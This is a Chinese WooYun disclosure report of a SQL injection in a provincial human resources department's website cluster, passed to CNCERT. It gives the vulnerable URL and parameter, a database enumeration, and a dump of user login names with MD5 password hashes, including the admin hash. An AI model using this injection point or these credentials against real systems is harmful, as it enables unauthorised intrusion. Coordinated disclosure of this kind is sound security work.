当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097538

漏洞标题:某省人力资源和社会保障厅站群沦陷可影响24个站点

相关厂商:CNCERT

漏洞作者: BMa

提交时间:2015-02-16 19:44

修复时间:2015-04-02 19:46

公开时间:2015-04-02 19:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-16: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

某省人力资源和社会保障厅站群沦陷-影响24个站点

详细说明:

后台:
http://www.snjrsj.gov.cn/hbwz/sms/login.jsp

0.jpg


0.1.jpg


0.2.jpg


厅财务处
厅培训处
厅工资处
厅仲裁处
厅人力资源和社会保障监察处
厅养老保险处
厅失业就业处
厅医保处
厅农保处
厅人事处
厅机关党办
厅纪检监察室
厅老干处
厅农工处
厅养老保险局
厅后勤中心
厅就业局
厅教研室
厅信息中心
厅鉴定中心
厅医保中心
厅结算中心
铁路司机学校
境外所


注入点:
www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03
参数:zxlb

current user:    'HBWZ'
available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBWZ
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: HBWZ
[68 tables]
+-----------------------+
| ATTACH                |
| BUS_DOC               |
| BUS_DOC_ATTACHMENT    |
| CMS_CHANNEL           |
| CMS_CHANNELPROPERTY   |
| CMS_CHANNELRIGHT      |
| CMS_CLICKCOOKIE       |
| CMS_CLICK_IP          |
| CMS_CLICK_WSBS        |
| CMS_CONFIG            |
| CMS_DOCLOG            |
| CMS_DOCPROPERTY       |
| CMS_DOCSTATUS         |
| CMS_DOCUMENT          |
| CMS_DOCUMENTPROPERTY  |
| CMS_OPER              |
| CMS_PAGE              |
| CMS_SCHEDULE          |
| CMS_SITE              |
| CMS_SITERIGHT         |
| CMS_SITEUSER          |`
| CMS_SPECIAL           |
| CMS_STATITEM          |
| CMS_TEMP              |
| DIC_AREA              |
| DIC_DICTIONARY        |
| DIC_DOCFROM           |
| DIC_HFFS              |
| DIC_HFKS              |
| DIC_JLHD_BUSINESSTYPE |
| DIC_STATUS            |
| DIC_TJZX              |
| DIC_USERTYPE          |
| DIC_ZXLB              |
| DIC_ZXZX_SERVICETYPE  |
| JLHD_JZXX             |
| JLHD_TSJB             |
| JLHD_ZXZX             |
| NEWNET_OLDNET         |
| QT_CQZC               |
| SYSTEM_ID             |
| SYS_MENU              |
| SYS_RESOURCE          |
| SYS_RIGHT             |
| SYS_SUBSYSTEM         |
| T_SURVEY              |
| T_SURVEYITEM          |
| UAMS_ORG              |
| UAMS_ROLE             |
| UAMS_ROLEMENU         |
| UAMS_ROLERIGHT        |
| UAMS_ROLESUBSYSTEM    |
| UAMS_ROLEUSER         |
| UAMS_USER             |`
| WJ_ADMINS             |`
| WJ_OBJECT             |
| WJ_QUESTION           |
| WJ_REQUEST            |
| WJ_SELECTER           |
| WSZB_FILE             |
| WSZB_SP               |
| WSZB_TOPIC            |
| WSZB_WYPL             |
| WSZB_WZZB             |
| XW_WZHF               |
| ZXZX_QX               |
| ZX_DX                 |
| ZX_INFO               |
+-----------------------+


Database: HBWZ
Table: CMS_SITEUSER
[2 columns]
+---------+--------+
| Column  | Type   |
+---------+--------+
| SITEID  | NUMBER |
| USER_ID | NUMBER |
+---------+--------+
Database: HBWZ
Table: UAMS_USER
[14 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| ADDRESS    | VARCHAR2 |
| CREATETIME | VARCHAR2 |
| CREATEUSER | VARCHAR2 |
| DELETETIME | VARCHAR2 |
| EMAIL      | VARCHAR2 |
| LOGINNAME  | VARCHAR2 |
| MOBILE     | VARCHAR2 |
| ORG_ID     | VARCHAR2 |
| PASSWORD   | VARCHAR2 |`
| REALNAME   | VARCHAR2 |`
| STATUS     | NUMBER   |
| TEL        | VARCHAR2 |
| USER_ID    | NUMBER   |`
| USERTYPE   | VARCHAR2 |
+------------+----------+
Database: HBWZ
Table: UAMS_USER
[20 entries]
+------------------+---------+------+-------+--------+--------+---------+-------
----+----------+----------------------------------+-----------+------------+----
-----------------+---------------------+
| ORG_ID           | USER_ID | TEL  | EMAIL | STATUS | MOBILE | ADDRESS | REALNA
ME  | USERTYPE | PASSWORD                         | LOGINNAME | CREATEUSER | DEL
ETETIME          | CREATETIME          |
+------------------+---------+------+-------+--------+--------+---------+-------
----+----------+----------------------------------+-----------+------------+----
-----------------+---------------------+
| 2010082600000143 | 163     | NULL | NULL  | 1      | NULL   | NULL    | snjgsb
x   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjgsbx   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:52:10 |
| 2010082600000143 | 164     | NULL | NULL  | 1      | NULL   | NULL    | snjsyb
x   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjsybx   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:53:45 |
| 2010082600000143 | 167     | NULL | NULL  | 1      | NULL   | NULL    | snjcxy
l   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjcxyl   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:59:08 |
| 2010082600000143 | 169     | NULL | NULL  | 1      | NULL   | NULL    | snjgzf
l   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjgzfl   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:03:26 |
| 2010082600000143 | 174     | NULL | NULL  | 1      | NULL   | NULL    | snjgwy
gl  | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjgwygl  | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:10:42 |
| 2010082600000143 | 175     | NULL | NULL  | 1      | NULL   | NULL    | snjsyd
wgl | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjsydwgl | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:12:43 |
| 2010082600000143 | 176     | NULL | NULL  | 1      | NULL   | NULL    | snjzyn
l   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjzynl   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:14:00 |
| 2010082600000143 | 180     | NULL | NULL  | 1      | NULL   | NULL    | snjzjz
c   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjzjzc   | NULL       | 300
1-01-01 00:00:00 | 2013-04-02 10:18:22 |
| 2010082600000143 | 141     | NULL | NULL  | 1      | NULL   | NULL    | snjzm
    | 01       | ef7d8ea3aeba02c75ba27233ff59fe75 | snjzm     | NULL       | 300
1-01-01 00:00:00 | 2012-05-30 09:38:24 |
| 2010082600000123 | 1       | NULL | NULL  | 1      | NULL   | NULL    | admin
    | 99       | 30983366f8039e3078918474e4a403a3 | admin     | 1          | 300
0-01-01 00:00:00 | 2007-10-17 20:32:11 |
| 2010082600000143 | 140     | NULL | NULL  | 1      | NULL   | 信息中心    | sn
jfjj    | 01       | 96e79218965eb72c92a549dd5a330112 | snjfjj    | NULL       |
 3001-01-01 00:00:00 | 2012-05-29 08:13:06 |
| 2010082600000143 | 160     | NULL | NULL  | 1      | NULL   | NULL    | snjghc
w   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjghcw   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 10:21:02 |
| 2010082600000143 | 161     | NULL | NULL  | 1      | NULL   | NULL    | snjylb
x   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjylbx   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:46:55 |
| 2010082600000143 | 162     | NULL | NULL  | 1      | NULL   | NULL    | snjylb
x1  | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjylbx1  | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:50:50 |
| 2010082600000143 | 165     | NULL | NULL  | 1      | NULL   | NULL    | snjsyb
x1  | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjsybx1  | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:55:14 |
| 2010082600000143 | 166     | NULL | NULL  | 1      | NULL   | NULL    | snjcxy
b   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjcxyb   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 04:56:44 |
| 2010082600000143 | 170     | NULL | NULL  | 1      | NULL   | NULL    | snjtjz
c   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjtjzc   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:04:41 |
| 2010082600000143 | 171     | NULL | NULL  | 1      | NULL   | NULL    | snjldj
c   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjldjc   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:06:29 |
| 2010082600000143 | 172     | NULL | NULL  | 1      | NULL   | NULL    | snjrsk
s   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjrsks   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:07:40 |
| 2010082600000143 | 173     | NULL | NULL  | 1      | NULL   | NULL    | snjjys
y   | 01       | 670b14728ad9902aecba32e22fa4f6bd | snjjysy   | NULL       | 300
1-01-01 00:00:00 | 2012-10-15 05:08:40 |
+------------------+---------+------+-------+--------+--------+---------+-------
----+----------+----------------------------------+-----------+------------+----
-----------------+---------------------+


Database: SYSTEM
[141 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS           |
| AQ$_INTERNET_AGENT_PRIVS      |
| AQ$_QUEUES                    |
| AQ$_QUEUE_TABLES              |
| AQ$_SCHEDULES                 |
| DEF$_AQCALL                   |
| DEF$_AQERROR                  |
| DEF$_CALLDEST                 |
| DEF$_DEFAULTDEST              |
| DEF$_DESTINATION              |
| DEF$_ERROR                    |
| DEF$_LOB                      |
| DEF$_ORIGIN                   |
| DEF$_PROPAGATOR               |
| DEF$_PUSHED_TRANSACTIONS      |
| DEF$_TEMP$LOB                 |
| HELP                          |
| LOGMNRC_DBNAME_UID_MAP        |
| LOGMNRC_GSII                  |
| LOGMNRC_GTCS                  |
| LOGMNRC_GTLO                  |
| LOGMNRP_CTAS_PART_MAP         |
| LOGMNRT_MDDL$                 |
| LOGMNR_AGE_SPILL$             |
| LOGMNR_ATTRCOL$               |
| LOGMNR_ATTRIBUTE$             |
| LOGMNR_CCOL$                  |
| LOGMNR_CDEF$                  |
| LOGMNR_COL$                   |
| LOGMNR_COLTYPE$               |
| LOGMNR_DICTIONARY$            |
| LOGMNR_DICTSTATE$             |
| LOGMNR_ERROR$                 |
| LOGMNR_FILTER$                |
| LOGMNR_HEADER1$               |
| LOGMNR_HEADER2$               |
| LOGMNR_ICOL$                  |
| LOGMNR_IND$                   |
| LOGMNR_INDCOMPART$            |
| LOGMNR_INDPART$               |
| LOGMNR_INDSUBPART$            |
| LOGMNR_LOB$                   |
| LOGMNR_LOBFRAG$               |
| LOGMNR_LOG$                   |
| LOGMNR_OBJ$                   |
| LOGMNR_PARAMETER$             |
| LOGMNR_PROCESSED_LOG$         |
| LOGMNR_RESTART_CKPT$          |
| LOGMNR_RESTART_CKPT_TXINFO$   |
| LOGMNR_SESSION$               |
| LOGMNR_SESSION_EVOLVE$        |
| LOGMNR_SPILL$                 |
| LOGMNR_TAB$                   |
| LOGMNR_TABCOMPART$            |
| LOGMNR_TABPART$               |
| LOGMNR_TABSUBPART$            |
| LOGMNR_TS$                    |
| LOGMNR_TYPE$                  |
| LOGMNR_UID$                   |
| LOGMNR_USER$                  |
| LOGSTDBY$APPLY_MILESTONE      |
| LOGSTDBY$APPLY_PROGRESS       |
| LOGSTDBY$EVENTS               |
| LOGSTDBY$HISTORY              |
| LOGSTDBY$PARAMETERS           |
| LOGSTDBY$PLSQL                |
| LOGSTDBY$SCN                  |
| LOGSTDBY$SKIP                 |
| LOGSTDBY$SKIP_SUPPORT         |
| LOGSTDBY$SKIP_TRANSACTION     |
| MVIEW$_ADV_AJG                |
| MVIEW$_ADV_BASETABLE          |
| MVIEW$_ADV_CLIQUE             |
| MVIEW$_ADV_ELIGIBLE           |
| MVIEW$_ADV_EXCEPTIONS         |
| MVIEW$_ADV_FILTER             |
| MVIEW$_ADV_FILTERINSTANCE     |
| MVIEW$_ADV_FJG                |
| MVIEW$_ADV_GC                 |
| MVIEW$_ADV_INDEX              |
| MVIEW$_ADV_INFO               |
| MVIEW$_ADV_JOURNAL            |
| MVIEW$_ADV_LEVEL              |
| MVIEW$_ADV_LOG                |
| MVIEW$_ADV_OUTPUT             |
| MVIEW$_ADV_OWB                |
| MVIEW$_ADV_PARAMETERS         |
| MVIEW$_ADV_PARTITION          |
| MVIEW$_ADV_PLAN               |
| MVIEW$_ADV_PRETTY             |
| MVIEW$_ADV_ROLLUP             |
| MVIEW$_ADV_SQLDEPEND          |
| MVIEW$_ADV_TEMP               |
| MVIEW$_ADV_WORKLOAD           |
| OL$                           |
| OL$HINTS                      |
| OL$NODES                      |
| REPCAT$_AUDIT_ATTRIBUTE       |
| REPCAT$_AUDIT_COLUMN          |
| REPCAT$_COLUMN_GROUP          |
| REPCAT$_CONFLICT              |
| REPCAT$_DDL                   |
| REPCAT$_EXCEPTIONS            |
| REPCAT$_EXTENSION             |
| REPCAT$_FLAVORS               |
| REPCAT$_FLAVOR_OBJECTS        |
| REPCAT$_GENERATED             |
| REPCAT$_GROUPED_COLUMN        |
| REPCAT$_INSTANTIATION_DDL     |
| REPCAT$_KEY_COLUMNS           |
| REPCAT$_OBJECT_PARMS          |
| REPCAT$_OBJECT_TYPES          |
| REPCAT$_PARAMETER_COLUMN      |
| REPCAT$_PRIORITY              |
| REPCAT$_PRIORITY_GROUP        |
| REPCAT$_REFRESH_TEMPLATES     |
| REPCAT$_REPCAT                |
| REPCAT$_REPCATLOG             |
| REPCAT$_REPCOLUMN             |
| REPCAT$_REPGROUP_PRIVS        |
| REPCAT$_REPOBJECT             |
| REPCAT$_REPPROP               |
| REPCAT$_REPSCHEMA             |
| REPCAT$_RESOLUTION            |
| REPCAT$_RESOLUTION_METHOD     |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL   |
| REPCAT$_RUNTIME_PARMS         |
| REPCAT$_SITES_NEW             |
| REPCAT$_SITE_OBJECTS          |
| REPCAT$_SNAPGROUP             |
| REPCAT$_TEMPLATE_OBJECTS      |
| REPCAT$_TEMPLATE_PARMS        |
| REPCAT$_TEMPLATE_REFGROUPS    |
| REPCAT$_TEMPLATE_SITES        |
| REPCAT$_TEMPLATE_STATUS       |
| REPCAT$_TEMPLATE_TARGETS      |
| REPCAT$_TEMPLATE_TYPES        |
| REPCAT$_USER_AUTHORIZATIONS   |
| REPCAT$_USER_PARM_VALUES      |
| SQLPLUS_PRODUCT_PROFILE       |
+-------------------------------+


管理员admin登录:

1.jpg


2.jpg


普通用户登录:
1、

pt1.jpg


2、

pt2.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-02-28 16:44

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给湖北分中心,由湖北分中心后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论